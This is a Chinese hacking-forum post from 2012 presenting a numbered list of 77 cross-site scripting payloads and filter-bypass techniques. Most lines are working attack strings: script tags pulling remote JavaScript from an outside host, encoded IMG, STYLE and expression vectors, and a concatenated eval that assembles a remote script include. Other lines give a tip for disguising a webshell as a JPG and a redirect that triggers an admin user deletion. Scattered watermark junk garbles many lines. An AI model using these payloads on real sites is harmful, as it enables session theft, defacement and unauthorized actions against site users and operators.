找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2120|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell
) c7 ]8 S, l1 V' iXSS跨站代码  <script>alert("")</script>$ t# O! p/ u5 ^7 e

% M% L5 k, l4 q将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马! H) f# ^+ ~7 ]* g
* N" z. N4 ~+ G; ?# k3 k

! I. s; M1 c' s* s; F7 P6 B2 c* x* A- a
1)普通的XSS JavaScript注入) e8 `' a. s" ~1 h: \
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ c8 L) s  [; T( |/ u% n4 K
. T! c! t  t! ^4 N. S; @1 r( ^0 q
(2)IMG标签XSS使用JavaScript命令/ I) }, V: w* D2 Y4 V+ \5 {
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
  ?* K; ?' s6 e
7 q" t- {5 ^8 B1 D(3)IMG标签无分号无引号
# o+ h$ l4 Z; y<IMG SRC=javascript:alert(‘XSS’)>2 v. C4 K2 e' p3 m% F

5 _1 M2 K! N8 N(4)IMG标签大小写不敏感4 s5 p6 o2 Z4 \- V" ~9 Z4 L
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" K6 d* O! s; W

, p. E% {0 p6 T& }% R9 S7 G/ m/ @(5)HTML编码(必须有分号)
* |, D: D9 `  g( q<IMG SRC=javascript:alert(“XSS”)>0 f5 j/ e2 u  |0 [

: w( k1 V% \* r(6)修正缺陷IMG标签6 p- L9 j/ L* w; ?% f2 g& E7 L
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
5 J5 s) L: d  }% u2 @0 M* A* Q  ^% {9 k/ [6 D+ @4 r/ S
(7)formCharCode标签(计算器)
! q( k# @! h+ W, a4 x# G  Y<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 M7 K6 I- N9 o, Q/ P, @) L2 i
7 f$ n2 P( u6 d% m6 o
(8)UTF-8的Unicode编码(计算器)
( d" Q0 r" Q# X; d, q<IMG SRC=jav..省略..S')>
$ w1 c" j1 Y( B7 j7 F( T- z# r0 t" o0 O5 n1 c+ X
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
* Q& l" I0 Q5 r  k0 i3 G<IMG SRC=jav..省略..S')>/ f0 P4 v0 m* A# b3 ?, t
7 P( j" e- |& ?- J
(10)十六进制编码也是没有分号(计算器)
! R# j0 G" _( M) P% V4 k<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
, q& \8 m' q: y" @8 }( z
0 b! F/ s  ^# |" D% \" \(11)嵌入式标签,将Javascript分开- T0 \2 h2 [. L+ m) m
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 U* |% Z" a, U, x
) S, r! T& v( f# M+ E2 H0 N1 J
(12)嵌入式编码标签,将Javascript分开
$ K* T+ b$ \& M  {$ s$ g<IMG SRC=”jav ascript:alert(‘XSS’);”>
' N5 ~, @9 O% m( I4 C! l
3 Q, M0 N# R5 u7 P! ~" z( W+ k4 o(13)嵌入式换行符# w3 e. s6 S7 L
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' ?, e' V8 k& ^7 ~- C* N) d" W0 k
(14)嵌入式回车5 W# S, p! M, q5 v) ~0 L" t
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 _0 h) l0 R% R3 u2 {3 f$ u5 F) S
1 q+ z! Y* c1 u( \
(15)嵌入式多行注入JavaScript,这是XSS极端的例子: i6 }; W$ p9 Q- G
<IMG SRC=”javascript:alert(‘XSS‘)”>
# p6 o' b7 ]" W( |
) ?9 ^. e% ]2 ?(16)解决限制字符(要求同页面)
% |' |% K& K" u9 U<script>z=’document.’</script>& l1 o% [2 d/ ^9 i& K; [: T0 Q
<script>z=z+’write(“‘</script>
+ p+ ?$ q% o) t+ H; l<script>z=z+’<script’</script># }* O5 e8 k# W+ ^8 G/ P
<script>z=z+’ src=ht’</script>' A4 |' ]; P& v8 \* r* U
<script>z=z+’tp://ww’</script>
9 B" L. `0 u+ x) @<script>z=z+’w.shell’</script>: S1 Z1 s7 P3 [0 K
<script>z=z+’.net/1.’</script>
1 d4 Z# }) M7 C: `, |5 b4 |* e<script>z=z+’js></sc’</script>( }) ^% q6 ?8 d2 P
<script>z=z+’ript>”)’</script>
1 \1 b" \& H1 y, |<script>eval_r(z)</script>
) E# W/ c8 p3 h+ Q" z  {; W
  O5 x- ]! L" t( \(17)空字符
  N1 ?+ W% C9 _7 b* u8 Operl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
) w9 q' u+ D1 s2 H5 L" H
* F" Z  c: N) o6 Q# n* [(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, B$ g" |9 ^5 r0 yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* ?* r* M% R( }* G$ F; g, L
" H+ R+ S$ A) ^/ W* p! f1 |2 W+ K
(19)Spaces和meta前的IMG标签
3 }4 u5 d9 ~/ u3 _<IMG SRC=” javascript:alert(‘XSS’);”>6 {9 |' I! Z$ ~* U) {& W- Q1 F7 r- U) W
6 U6 X% V# s6 J) r, X
(20)Non-alpha-non-digit XSS
7 q5 }" {! K7 {; c4 U<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
  q- z7 g4 o! C% f+ [1 K
. U- g' I3 h$ x" J7 z* s" i; G(21)Non-alpha-non-digit XSS to 2
4 u( \, ]. w5 L% N) U! `3 b- c0 D4 k<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- w# P6 ^0 Z7 q( U  l  l! r  |

$ I7 `! ?7 h7 G' B) @(22)Non-alpha-non-digit XSS to 3
+ N" u" m0 r6 F7 r<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& }2 ~3 \7 t2 z) f  E7 E% I/ U: f& `! a7 \+ L/ }) e5 y7 }0 R5 K
(23)双开括号
& @! `7 r. C; E# e/ m<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 @+ y* d% \7 s) \) n2 i" H

: T& \! ?7 D4 ~) T$ e9 ~(24)无结束脚本标记(仅火狐等浏览器): v* }" h5 Q7 ]! P
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
0 |- y8 `! f+ j8 E+ S
  S4 ?" b- b6 F' M9 j8 b(25)无结束脚本标记2
# \7 D; p- |/ i' l7 @9 d2 S( }# g<SCRIPT SRC=//3w.org/XSS/xss.js>4 q( U- z$ |2 V$ V

! O7 i* d6 R3 M) l# F% b! z  R(26)半开的HTML/JavaScript XSS
) S$ C& k) ~/ _& p<IMG SRC=”javascript:alert(‘XSS’)”
; J& c) b) L: e# N* k$ a* Z
  q& ?' g9 u  |0 h6 k% C& ]4 Q(27)双开角括号
( e& k8 ]3 v! q3 r7 E<iframe src=http://3w.org/XSS.html <, g: I3 f. u( ^1 x! f% Z
: }5 U2 N$ |* h# h! K2 b. U
(28)无单引号 双引号 分号1 U! l6 |2 n' ^
<SCRIPT>a=/XSS/. c7 u! N2 U  Z8 R" Y: w0 d
alert(a.source)</SCRIPT>6 Y% y* G# u, I+ }2 Q
( }! J0 B& P( c6 J
(29)换码过滤的JavaScript
! ^" t' R3 t- I\”;alert(‘XSS’);//; U  |# F4 W( r+ h5 d* \* M

  R9 E' U+ B6 V(30)结束Title标签
: l7 p* ^! W3 ]5 V</TITLE><SCRIPT>alert(“XSS”);</SCRIPT># y  \: S2 r; Q6 S8 E
+ c: j  H7 Z  R! G( k$ b4 X
(31)Input Image2 f; J5 U( u9 \2 `
<INPUT SRC=”javascript:alert(‘XSS’);”>
% o, p* D9 Z2 W5 W) h! B0 C8 H4 v7 K4 ~# A
(32)BODY Image
! V" q+ I9 M6 I  e9 c& T( B<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
6 M- Z1 D* D$ o0 ]- r7 Z. j+ U9 F; q* J
(33)BODY标签% O! d6 f7 Z* O6 _
<BODY(‘XSS’)>
; W% W, u4 u" J5 h' J8 H$ r9 L6 \  Z" f8 T3 N5 s) B8 J
(34)IMG Dynsrc' O9 Q$ F, T' g! N9 b
<IMG DYNSRC=”javascript:alert(‘XSS’)”>0 x4 w2 a( }; x$ C% t

7 \0 T; f$ n, ]3 g: U(35)IMG Lowsrc
* _% |7 c5 F$ A( p0 ?/ `/ v" A<IMG LOWSRC=”javascript:alert(‘XSS’)”>* l& O: I) z# T  j/ \% ?1 \
; Y$ q: B  n/ ^' i- e% z' r( a
(36)BGSOUND6 W+ f+ J3 U/ U8 f
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
2 H) K& `3 W# N  m
% h! D6 K. @9 |6 o) Q(37)STYLE sheet+ n! g8 p- Y' C( a
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 s- z" h, \1 R" A/ @* D& U3 S% m% y1 W" b! v
(38)远程样式表- E3 e* T3 d) l& t! t4 @
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>$ P! h' n. `- P5 l! \2 h/ o
; h% R: _; z& I3 c: L0 _9 `
(39)List-style-image(列表式)& {9 p! V0 {, ~! W" E
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( R' ]8 ^% w/ x+ T$ ^- g2 l- s8 a
(40)IMG VBscript
- R. ]% H0 o  l  t1 P<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS5 |; x! @5 S* u9 P

0 D4 p; J' v) P1 W) }5 H1 ^(41)META链接url
9 y% `6 w" `% N% @<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>" L( c  |# T! d% ~! b8 D( t
( v3 N) ?2 {0 V5 }1 @
(42)Iframe
" D% m9 L5 u4 E4 |  y; q; {* ~- d1 I' n<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
5 V1 t. d, Z2 m7 S" X) Q" Q  X  ]) ?(43)Frame% i# u6 n7 d& q. A4 @4 ?. e
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
3 C5 w) D+ j8 ?* X% \$ X& F
/ N6 r. J' @  K4 D2 X2 F(44)Table
  P0 E! p2 o1 a9 @2 x# u, O- \5 K7 x! Q<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 j- [  E. t# ^3 B& @
! a7 Q6 ?) r( p* V$ Z5 ?
(45)TD
; v/ V) x" U! O1 K  r<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 c5 i5 I% T" i' u; d

5 y7 K/ q  r7 C1 |! x% M, l% [(46)DIV background-image
9 @9 D9 W, X/ f<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ P. s' U0 [+ e' z8 ]- v2 l! r, j3 Y  l/ X' u2 r+ C0 z& h
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
6 ^. b# s- K, W5 E) ]/ [, U( O) G<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>9 u' @9 C2 k' z1 a3 v

6 w3 N# F2 B8 a(48)DIV expression
2 g  [# U' Q/ S<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 P" P+ U( A! J! j2 S
4 S) U/ s. f1 p$ H1 D* j
(49)STYLE属性分拆表达
' F8 N5 g0 [4 P* C<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 x7 q" F* |; t* n1 o6 [

: g; M4 [$ y! {5 i6 r! `(50)匿名STYLE(组成:开角号和一个字母开头)$ z$ d) K) s  U
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”># K# D) ?& {7 y( a0 X

, R3 t- T0 x3 P(51)STYLE background-image
% E% f. g  u2 Y  \2 T8 Z6 C<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>! g* o, o, [4 |; V& ?
9 E- O6 O) _& u
(52)IMG STYLE方式6 X9 ^( m( h2 d
exppression(alert(“XSS”))’>- q6 ]) Q& l2 p, K. N; G9 l
  _# l) Y8 |( S1 v2 q9 A0 h
(53)STYLE background
0 N0 e* z; w* Q: y3 y  h<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>* j' a  e7 Y: d: g1 ^5 H
: J( d" R/ `( _
(54)BASE% @, m5 t8 o3 c) S
<BASE HREF=”javascript:alert(‘XSS’);//”># F! J0 w; L4 v$ M0 q. _) t4 ^
9 a1 M/ [( g- T
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
3 v# _: E+ U  _2 I, c+ y) B<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>( y  [+ R# f: w4 w
- a! o4 S. W/ b5 ?
(56)在flash中使用ActionScrpt可以混进你XSS的代码
) F, Y0 b3 _  {7 ]a=”get”;
4 N0 x# b9 G8 }0 z4 hb=”URL(\”";) G& y; Z7 d$ e( f
c=”javascript:”;
( `& t) @6 U9 p6 H, Ld=”alert(‘XSS’);\”)”;
3 l0 T" a% |3 i8 i6 V& ~6 k' P1 Keval_r(a+b+c+d);
( Q9 X( S% O" d$ y8 [( r8 p; l4 y) N: ^
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. O2 E' S$ ~' n2 Y5 U/ Y<HTML xmlns:xss>
% t; I5 w3 }) o( Z3 J3 W6 T: B+ w6 s<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>, U5 u8 }* N7 t+ F
<xss:xss>XSS</xss:xss>& z) G$ A. e6 G% q
</HTML>3 k/ k  {) |$ Z. L6 s

+ U/ l" R# B: }% I(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
/ n% q+ _; {7 n& \/ O+ F<SCRIPT SRC=””></SCRIPT>
, \# g$ L  c, \! `, r: [6 N3 b! M& w) G
(59)IMG嵌入式命令,可执行任意命令
# `& Q+ d# v, n- t: C( _<IMG SRC=”http://www.XXX.com/a.php?a=b”>( t5 L0 o) }& s2 y' M
5 S" U$ Z) y& X' J, {( r! l
(60)IMG嵌入式命令(a.jpg在同服务器)
% N3 A. u9 {6 ARedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
5 [% c# S6 E# n: K3 L. |2 N1 t. y) r& I! G6 v
(61)绕符号过滤
* k% @0 {2 x+ @6 R( t<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! [% l* C7 i+ H- M7 R2 \" t
# ^; H6 K0 a2 B  _5 R* Z) O6 c7 c(62)4 J3 y4 F$ i3 f# Z
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>; f/ `1 S/ D$ D9 o: _% b' N' {2 }
+ k: K2 H( C5 G' w5 I! i" w6 \
(63)  V1 U. J* h) c  t- y" A
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! n. u( I* H& C. e. O- j

8 b4 a3 g; o" M, l4 e(64)  J: m1 ?' L5 [# j) p
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
, s# T( h2 B- Q, ~( `- `' Y# h* V) @: l3 J9 L! v" e
(65)
8 X0 Z5 {1 q" f6 s/ i& ~1 h' U<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
0 g4 Y3 K- ^5 o$ G3 T1 j2 y! i8 d- K3 K1 F3 z
(66)( b8 p8 U1 A! b- Z& s
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
' |4 r3 K2 C$ a( p- ]2 }) m) b
' _: l4 J( K9 n; f5 ^(67)% u- Q- }0 ]* e8 k' l
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>) q& f) d! ?5 P+ A# E2 ]# N, }$ F: A

6 F. z- ]& \4 r- `+ v(68)URL绕行2 y# l- u+ x; j2 o# D
<A HREF=”http://127.0.0.1/”>XSS</A>3 C% ?9 V! c6 M+ _7 m. Q% r! }7 n
+ o5 z9 U0 x) G3 L. V" X- A( x" j
(69)URL编码( X& N- ^% J# W2 E. Q( S) @' I8 ^
<A HREF=”http://3w.org”>XSS</A>! k# \# C4 E+ y( i
4 g" |4 ^( U9 ~) K
(70)IP十进制
( I! r! `& k3 ]<A HREF=”http://3232235521″>XSS</A>
- D1 r) G6 E6 Z+ u3 x4 h
  U% |  a  ], l1 v(71)IP十六进制: H7 Q. X; Z; s6 x' k
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>* j, p. B2 \# O( _: b
; c- u% m' v: \8 Z" ^! g* W7 N
(72)IP八进制
6 w; N. f% m5 q<A HREF=”http://0300.0250.0000.0001″>XSS</A>% [9 E: m8 A  P3 K7 v& {

2 U/ D) K$ o$ b" Y" N0 ~(73)混合编码
; m1 a; V3 |0 N; I, Q' \<A HREF=”h
8 d2 D9 h0 W2 X2 w7 U6 Utt p://6 6.000146.0×7.147/”">XSS</A>; z- m% }" I, u
; W  p1 `+ A# |6 U
(74)节省[http:]6 ?- B; V* N  h
<A HREF=”//www.google.com/”>XSS</A>
4 o: N! p7 W, [  I+ R" ?
1 m& g  g/ k+ b% N( S6 \(75)节省[www]
+ {" F. m, u) d- u6 |; p3 _4 E$ x<A HREF=”http://google.com/”>XSS</A>
% X- T) X  C! t. E( {' T4 J5 r# n$ C6 |% Y
(76)绝对点绝对DNS
7 ]+ a9 W4 H( \3 g' d0 A2 H% F0 H<A HREF=”http://www.google.com./”>XSS</A>. P; U! s: i0 |, H/ J0 b  U/ H
& s! _& a4 b: S3 s
(77)javascript链接* {/ y/ |- r, v, l+ }' r: k
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>. h9 L! ?4 I4 h- C8 J8 B+ U$ t" S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表